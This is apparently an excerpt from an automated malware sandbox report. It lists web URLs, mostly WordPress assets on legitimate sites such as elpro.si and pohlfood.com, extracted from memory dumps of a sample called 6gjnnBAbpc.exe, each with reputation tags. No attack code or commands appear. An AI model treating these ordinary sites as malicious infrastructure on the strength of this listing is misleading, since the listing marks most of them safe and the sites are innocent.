                                                                                                                                                                                                                          http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.06gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.elpro.si/brand/inor/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-1536x864.jpg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f16gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://oss.maxcdn.com/respond/1.4.2/respond.min.js6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.19.06gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.06gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-768x432.jpg6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2.png6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.valselit.com/174-appartement-a-vendre-grenoble-305146gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
